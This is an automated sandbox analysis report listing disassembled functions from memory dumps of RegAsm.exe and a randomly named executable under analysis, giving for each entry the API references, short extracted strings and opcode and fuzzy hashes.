Function 0040A430 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0040A46F
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A523

Strings

csm, xrefs: 0040A50D

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction ID: 2e999a1580a82348229a279466bd0bfc2513c0ac70a5a2249b741fcd72562a23
Opcode Fuzzy Hash: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction Fuzzy Hash: 2741C834A00318ABCF10DF69C844A9E7BB0FF45314F1481A6E8146B3D2D779E961CB9A

Function 0040AD3D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0040AD62

Strings

RCC, xrefs: 0040AD7C
MOC, xrefs: 0040AD74

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction ID: a4c454b0bcb5eef0a2e58a0d06434270c6490fd8828ce8058ef1224e804d7477
Opcode Fuzzy Hash: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction Fuzzy Hash: 4C416E71900209AFCF15DFA4CD81AEEBBB5FF48304F19846AF904B7291D3399960DB95

Function 00407EA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407EAE
___raise_securityfailure.LIBCMT ref: 00407F6B

Strings

@SC, xrefs: 00407F66

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: @SC
API String ID: 3761405300-4053289583
Opcode ID: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction ID: 10e33e2e5eb9a3d5286ccbecc20551b6eaee076d59bf9c7ce06d7c1cd455d27c
Opcode Fuzzy Hash: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction Fuzzy Hash: 2D11E3B4651A04DBD318CF15F8817883BA4BB28346B50B03AE8088B371E3B09595CF5E

Function 00401870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00401875
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004018BA

Part of subcall function 004058AA: _Yarn.LIBCPMT ref: 004058C9
Part of subcall function 004058AA: _Yarn.LIBCPMT ref: 004058ED

Strings

bad locale name, xrefs: 004018C8

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction ID: 698a41e2f8890499ec269fe88a942146f7bab7e11b1414401b60b7a9d3f26e65
Opcode Fuzzy Hash: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction Fuzzy Hash: 90F01D71515B408ED370DF3A8404743BEE0AF29714F048E2EE4CAD7A92E379E508CBA9

Analysis Process: HPd7I3vQri.exePID: 5476, Parent PID: 6184COMMON

Executed Functions

Function 05028D18 Relevance: 2.7, Strings: 1, Instructions: 1496COMMON

Download Yara Rule

Strings

4, xrefs: 05029C68

Memory Dump Source

Source File: 00000004.00000002.4691456690.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5020000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: e7417fd655c581dfc9d1a46c5ca61c2eed6cddea3890e756868d4578c14a57d2
Instruction ID: 4e041a8c5c9a1dbeb2abf05eef22caa4b875932d3c129a07d23debd3f1d7679e
Opcode Fuzzy Hash: e7417fd655c581dfc9d1a46c5ca61c2eed6cddea3890e756868d4578c14a57d2
Instruction Fuzzy Hash: ABE25175B00119DFDB55DF54D995AAEBBF6FB88300F1080A9E90AAB358CB309D86CF50

Function 05029202 Relevance: 1.9, Strings: 1, Instructions: 696COMMON

Download Yara Rule

Strings

4, xrefs: 05029C68

Memory Dump Source

Source File: 00000004.00000002.4691456690.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5020000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 0d6eb39cb6ab67b862f67052b6dd2b30f49f34100f3147333d9a26b321d250aa
Instruction ID: 70d798df0534df09b2094bd76e0ac35891a80e644f80b885585f6d5353f56112
Opcode Fuzzy Hash: 0d6eb39cb6ab67b862f67052b6dd2b30f49f34100f3147333d9a26b321d250aa
Instruction Fuzzy Hash: F3622D71B00219CFDB55EF64D955AAEB7F6FB88300F1080A9E50AAB348DB309D86CF51

Function 00C95530 Relevance: 1.9, Strings: 1, Instructions: 683COMMON

Download Yara Rule

Strings

Oi8(, xrefs: 00C95742

Memory Dump Source

Source File: 00000004.00000002.4610490503.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID: Oi8(
API String ID: 0-2266985433
Opcode ID: df572f2027f1eddbc8a28371ebb4a323ded0abe09f51f4f5e16b2b895c966d9f
Instruction ID: 0feaf8f44c8177f9e93a375b9b31a63aed8986e6569c0a25c18cfeb4bbb0a7f1
Opcode Fuzzy Hash: df572f2027f1eddbc8a28371ebb4a323ded0abe09f51f4f5e16b2b895c966d9f
Instruction Fuzzy Hash: 72521535A00514DFDB15DFA8C988E69BBB2FF88304F1681A9E5099B272CB31ED52DF40

Function 0557D490 Relevance: 1.5, Instructions: 1489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4704199791.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5570000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddb0c8b6b0103b73269455cf48e7c1b4ca74f2a8645953dcf27fa4df2b4055a1
Instruction ID: 4fd52035981e20b1f16d95ff949d294282d23a17fcbf98ce67be451bc46930c0
Opcode Fuzzy Hash: ddb0c8b6b0103b73269455cf48e7c1b4ca74f2a8645953dcf27fa4df2b4055a1
Instruction Fuzzy Hash: 0CE2187560044ACFC704FF24D6A6E6A77F2EB89300F5181A9A44A9B79DDF34AD02CF85

Function 05560040 Relevance: .7, Instructions: 698COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4703690018.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5560000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a90f05c0266489fb16385ab952f3047c83b6b304fbdd71cd31517727d4486004
Instruction ID: fa86cb9e78db7b486a6d6eefb583c0ad35552dff4e29d24542b851afc33570a5
Opcode Fuzzy Hash: a90f05c0266489fb16385ab952f3047c83b6b304fbdd71cd31517727d4486004
Instruction Fuzzy Hash: F95270357101098FD708EFA4D454AAEBBF6FBC8700F148169EA06AB399DF359D46CB90

Function 05E9C8C8 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4723700380.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5e90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cee95a39d815ca4062150dd942b5bb97208fe2be33c111e8e04d04196fd260e8
Instruction ID: 719fcf78077e8aa5914956ffdb0d4b6540b8fa1a167f3a089d0899c28181c6d3
Opcode Fuzzy Hash: cee95a39d815ca4062150dd942b5bb97208fe2be33c111e8e04d04196fd260e8
Instruction Fuzzy Hash: 05523875A00114DFDB19DF68C984EA9BBB2FF88314F1581A8E54AEB262DB31EC41CF40

Function 05569070 Relevance: .6, Instructions: 569COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4703690018.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5560000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d075e0265f6097e899e02d7f8b1cab9232acf1cbd0bcb487d9ca5d0b6eb27a13
Instruction ID: c341b7993b3e63ed2112a032fd9c56a7ce5536bd376932ca38f0fa3d562c7f2d
Opcode Fuzzy Hash: d075e0265f6097e899e02d7f8b1cab9232acf1cbd0bcb487d9ca5d0b6eb27a13
Instruction Fuzzy Hash: 76325A35B002098FDB14EFA4D895AAEBBF2FB88300F108569E50697759DF70AD46CF91

Function 05560006 Relevance: .5, Instructions: 541COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4703690018.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5560000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5407a9916054f0ade3fac4dbc66b2883d4712a96c130145b0d087b2fbc1478da
Instruction ID: 09a3e306bbc5c8200acb47d2907885d3414d21748a7e3df9a13b0101b87ffc35
Opcode Fuzzy Hash: 5407a9916054f0ade3fac4dbc66b2883d4712a96c130145b0d087b2fbc1478da
Instruction Fuzzy Hash: 1C22B2317101498FD709EFA4D458AAE7BE6FBC8700F148169E606EB399DF359D06CB90

Function 05595CA0 Relevance: .5, Instructions: 503COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4705057927.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 773aef066a82f87b1ff355bc79e4be503f39274ec561d83e9728fcc31b16f082
Instruction ID: 06211014ed683d5ceffa74bb56ccb023f7c09f4c80ef78a2eeebca4f7f17ae05
Opcode Fuzzy Hash: 773aef066a82f87b1ff355bc79e4be503f39274ec561d83e9728fcc31b16f082
Instruction Fuzzy Hash: E6121135B00606DFDF09FFA4D8A49AEB7B6FB88300B108529D546A7758DF349D5ACB80

Function 05E9B9E5 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4723700380.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5e90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0047182d60ba2473cfd767aed320d02dbe657148cd906c27ca04362bc22b2307
Instruction ID: db44c3d592379537a6089b162483dcb94a4d272845b12b97e11d43079ac7940f
Opcode Fuzzy Hash: 0047182d60ba2473cfd767aed320d02dbe657148cd906c27ca04362bc22b2307
Instruction Fuzzy Hash: BC12F634A00219CFDB54EF68D888AA9B7F6FB88300F5481A9E549A7355DF30AE85CF51

Function 0559E910 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4705057927.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37431c22e2e097b4189cb53d5bb90efe161690c59514e132777cae2b4df259e3
Instruction ID: ad6919536d2f763dd1cb8b6b368be233048e4069463f8727903aaafbf78b67f0
Opcode Fuzzy Hash: 37431c22e2e097b4189cb53d5bb90efe161690c59514e132777cae2b4df259e3
Instruction Fuzzy Hash: 3ED12C35B00A16DFCF09FB64D8649BE7BB6FBC8200B108219E446A7758DF389957DB81

Function 0559E920 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4705057927.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c8fb53daa7a1bf60d2c10d6b9164f4cb7b87171dacd274d94e6d54697b86eb
Instruction ID: 5a8a8046c38a1361d1ac8942f11d7992f36286855096526921a8ee67b5cfe0ef
Opcode Fuzzy Hash: f3c8fb53daa7a1bf60d2c10d6b9164f4cb7b87171dacd274d94e6d54697b86eb
Instruction Fuzzy Hash: 06D11C35B00A16DFCF09FB64D8649BE7BB6FBC8200B108219E846A7758DF385957DB81

Function 05E9C8B9 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4723700380.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5e90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c245ef5c99f293814f16c52f63f69c170ca8270f3c2950578933f4f8c1c913c
Instruction ID: 3bd652bb300053d5e4bba22305eab663fba58501170a4d23b197ace9dfc72f43
Opcode Fuzzy Hash: 1c245ef5c99f293814f16c52f63f69c170ca8270f3c2950578933f4f8c1c913c
Instruction Fuzzy Hash: 6AB15B71B001189FDB18DF78C984BADBBF2BF88304F2491A8E15AEB251DB70AD45CB50

Function 067D752A Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4747235179.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67d0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 457846e12b9831c3c1235a159eef724201a1273d2bfcf63c284a42d932d0a2e7
Instruction ID: 41ab4c976c48b8a48e8be6a6b795a032b8fa9d15c7f4bd55c0cb4c4e03ef497e
Opcode Fuzzy Hash: 457846e12b9831c3c1235a159eef724201a1273d2bfcf63c284a42d932d0a2e7
Instruction Fuzzy Hash: D4B1A330B00204CFDB88EF68D494BAE77B2EBC9310F508A65D5165B365EB74AD86CB91

Function 067CC170 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4746191001.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67c0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2ee319f5c1b6f268cc5aa2dfded3409d2e1cf6c48e0b08d111290d1d2ae4eba
Instruction ID: 10b159d86eabe775f5c7ede950ccf74bc35e337174b5dd954cae6a85cb90f79d
Opcode Fuzzy Hash: e2ee319f5c1b6f268cc5aa2dfded3409d2e1cf6c48e0b08d111290d1d2ae4eba
Instruction Fuzzy Hash: 6BB14C70E04108DFEB85DFA9D454BAEBBF2FB88320F14D16ED019A7255DB749982CB90

Function 00C9E1E0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4610490503.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15d8114c18d85ad2c87d7e15abf315ba86bc04aef0e36e36fcf5ef936eac7ea7
Instruction ID: fa57c2f436bf4064cd35800bb65e64cb3a360a2ab71bb4da09d874c2e10bdb87
Opcode Fuzzy Hash: 15d8114c18d85ad2c87d7e15abf315ba86bc04aef0e36e36fcf5ef936eac7ea7
Instruction Fuzzy Hash: A0B16E70E00619CFDF10CFA9D8897ADBBF2BF98714F148529E825E7294EB749941CB81

Function 067CC1B0 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4746191001.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67c0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12154a9d863452f2588cdf64135dedf320121a327677ec26ca2a3ade45e24f64
Instruction ID: 233ff9449c4d4960bd6009026f199234cda50569d6eec3de9a9eed4cd71c8f4c
Opcode Fuzzy Hash: 12154a9d863452f2588cdf64135dedf320121a327677ec26ca2a3ade45e24f64
Instruction Fuzzy Hash: 73A16D70E00108CFEB95DFA9D454BBEB7B2FB88320F14D26ED009A7255DB749986CB91

Function 00C9D5C8 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4610490503.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe5a94c4fbf89c3b52d3ed908dff4e357b86dffd08593befe98681fc69215d3
Instruction ID: a3f9bfd0fecc429f2de2c1f8f8f6aa5317fa7eb88824973fed36e58f139eac7e
Opcode Fuzzy Hash: 5fe5a94c4fbf89c3b52d3ed908dff4e357b86dffd08593befe98681fc69215d3
Instruction Fuzzy Hash: 5E917DB0E00209CFDF14CFA9C9897ADBBF2AF88714F148129E416B7294EB749945CB85

Function 05E9C94F Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4723700380.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5e90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb562892af007eb11da6ebe52c12356fa1d73dc7e33788b3009cd3420708cad0
Instruction ID: 993a44a974bba2e62de970dbc26e7757866fcdb42cfb3452145a861934305cd2
Opcode Fuzzy Hash: eb562892af007eb11da6ebe52c12356fa1d73dc7e33788b3009cd3420708cad0
Instruction Fuzzy Hash: D5915771B005198FDB18DF68C984BADBBF2BF88314F259168E15AEB251DB70EC46CB50

Function 067CC1EC Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4746191001.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67c0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aba2960abad517003e6cb9eeec039237c127f63406ea74df3221503770ba65c
Instruction ID: b8cbdf96ee3d2f8d172b88b672f41d17af1fb5e6becd7c382a3736b772c49641
Opcode Fuzzy Hash: 2aba2960abad517003e6cb9eeec039237c127f63406ea74df3221503770ba65c
Instruction Fuzzy Hash: 13A13B30E04108CFEB85DFA9D454BBEB7B2FB88320F14D56ED019AB255DB749986CB90

Function 067CC2A6 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4746191001.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67c0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f866c54c159e47239bfce3ecc906e152ddcad95688a3114b59f616c2f7200a
Instruction ID: 57bb03f2ea9848700a6f00fefd298e4394da762b5158809150c09f28ecad7f22
Opcode Fuzzy Hash: b6f866c54c159e47239bfce3ecc906e152ddcad95688a3114b59f616c2f7200a
Instruction Fuzzy Hash: B6913C30E04108CFEB85DFA5D454BAEB7B2FB88320F14D56ED019A7255DB749985CB90

Function 067CC4E7 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4746191001.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67c0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17d1895c5dd7bb22dcbeb147b8092fbc493a8065f943386cf153e12ce412c612
Instruction ID: 68c1e3c9a74fdd7a9c12e1f081cf667c4f54bb57887ea24790428817a2e11f83
Opcode Fuzzy Hash: 17d1895c5dd7bb22dcbeb147b8092fbc493a8065f943386cf153e12ce412c612
Instruction Fuzzy Hash: 4A914C30E04108CFEB85DFA5D454BBEB7B2FB88320F14D16ED019AB255DB749986CB91

Function 067CC528 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4746191001.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67c0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5befc2833a787c45a881e38894adeaa2e93110677e09fb6878a33e1c54e97e46
Instruction ID: 2b8c4855c2df1453e29ed0ad1ef56525784afa0090036d5f9caddc22b57540a3
Opcode Fuzzy Hash: 5befc2833a787c45a881e38894adeaa2e93110677e09fb6878a33e1c54e97e46
Instruction Fuzzy Hash: 73915D30E04108CFEB85DFA5D454BBEB7B2FB88320F14D16ED019AB255DB749985CB91

Function 067CC586 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4746191001.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67c0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd4f130feee06f4e039e5e669a3eaf73772354bf23015163d39b20e50e4e3f7
Instruction ID: 420ed0433d2d14c0d7975b2031aedebc2d2b406b03753da296cac71897c5103d
Opcode Fuzzy Hash: 3cd4f130feee06f4e039e5e669a3eaf73772354bf23015163d39b20e50e4e3f7
Instruction Fuzzy Hash: E5915D30E04108CFEB85DFA5D454BBEB7B2FB88320F14D26ED019AB255DB749986CB91

Function 067D6998 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4747235179.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67d0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de2c0fa5f28ad25da924f86daf3e380d098ea04be491aa1df0e84f84e27fda2
Instruction ID: 08e33b8fde1983e949f491fb6441154b1302c94e1e716f83f5219a0f75b52c48
Opcode Fuzzy Hash: 2de2c0fa5f28ad25da924f86daf3e380d098ea04be491aa1df0e84f84e27fda2
Instruction Fuzzy Hash: 077180346006058FDB95EF58C494A7BB7F3EBC8300F91892AC6469B355EB74BD86CB81

Function 00C95188 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4610490503.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dcca4e65e10a5e4423aa338e7c44d53044b092a560d596cd54be45f2c1d060e
Instruction ID: e4f9a2ff07071fcaa25172ace2541427f2b37d94aa1c61903d195e94f854fdfb
Opcode Fuzzy Hash: 4dcca4e65e10a5e4423aa338e7c44d53044b092a560d596cd54be45f2c1d060e
Instruction Fuzzy Hash: E5616C71A1164ACBE70DEF7AE850699BBE3FBC8304B14C07AC014AB26DEF7519468B54

Function 00C951BF Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4610490503.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 045937487d0155c6b41ebe14a0db084f37a71e0fa16cf0e5b62ac615dd248b9c
Instruction ID: 1f246bdcd4f0d2e54d3a5fe1b728f4e22e8da7de7f8de5a0b1eccd84a25b67f7
Opcode Fuzzy Hash: 045937487d0155c6b41ebe14a0db084f37a71e0fa16cf0e5b62ac615dd248b9c
Instruction Fuzzy Hash: 91615C71A11A46CBE70CEF7AE8506A9BBE3FBC8304F14C03AC054A726DEF7519468B54

Function 00C951D0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4610490503.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e9029125895ec31d7300ad548e93a994e916261f6fc944a5658608f4ab4c34
Instruction ID: 88e040e77cd17c47ae0b79704fa722f5909d840e4b6dff2aa762c97462c891b3
Opcode Fuzzy Hash: 45e9029125895ec31d7300ad548e93a994e916261f6fc944a5658608f4ab4c34
Instruction Fuzzy Hash: 4C515C71A11A46CBE70CEF7AE8506A9BBE3FBC8304F14C039C114A726DEF7415468B54

Function 00C96780 Relevance: 5.1, Strings: 4, Instructions: 141COMMON

Download Yara Rule

Strings

X^v, xrefs: 00C96926
ob0, xrefs: 00C96A4F
.&1>, xrefs: 00C9691C
t`n(, xrefs: 00C9687C

Memory Dump Source

Source File: 00000004.00000002.4610490503.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID: .&1>$X^v$ob0$t`n(
API String ID: 0-3849121580
Opcode ID: b03425aec5483fe44e7ff6b5e33a73a9bbf84e3126c9103011475d76c8f79734
Instruction ID: 4b4916682059020614c0d26119b3a54b38d9d38fcacf8f66c26094a57d103448
Opcode Fuzzy Hash: b03425aec5483fe44e7ff6b5e33a73a9bbf84e3126c9103011475d76c8f79734
Instruction Fuzzy Hash: 219165B0805B848FD349CF5A8599BA4BBE0BF89304F5A82FAC15D8F632EB318445CF50

Function 02948020 Relevance: 3.8, Instructions: 3776COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4622275913.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2940000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a27083e59d1cf41841d333438fcf897adb2c53193cd68e469dff64c207fdd7
Instruction ID: 7b947ae9a95e06a2d6d99483fd276fff11318525e22faafd0b02d000e1356ccd
Opcode Fuzzy Hash: e9a27083e59d1cf41841d333438fcf897adb2c53193cd68e469dff64c207fdd7
Instruction Fuzzy Hash: 28539330F116248BCB686B688864BBE79FBAFC8B54F54455FDA06E7344DF708C428B91

Function 05E9ACB0 Relevance: 3.3, Strings: 2, Instructions: 788COMMON

Download Yara Rule

Strings

Kem^, xrefs: 05E9B6C9, 05E9B6CE
2, xrefs: 05E9B4FC

Memory Dump Source

Source File: 00000004.00000002.4723700380.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5e90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID: 2$Kem^
API String ID: 0-147088213
Opcode ID: 46408c40aecd19e5555f3e02a20dc143a0a2be3dcb37f6b667645ebad574ac07
Instruction ID: 68c9682ef5921152d2d26ff81c95ccc4b9d69d1118ceb68a6fb8f7d26c1648b3
Opcode Fuzzy Hash: 46408c40aecd19e5555f3e02a20dc143a0a2be3dcb37f6b667645ebad574ac07
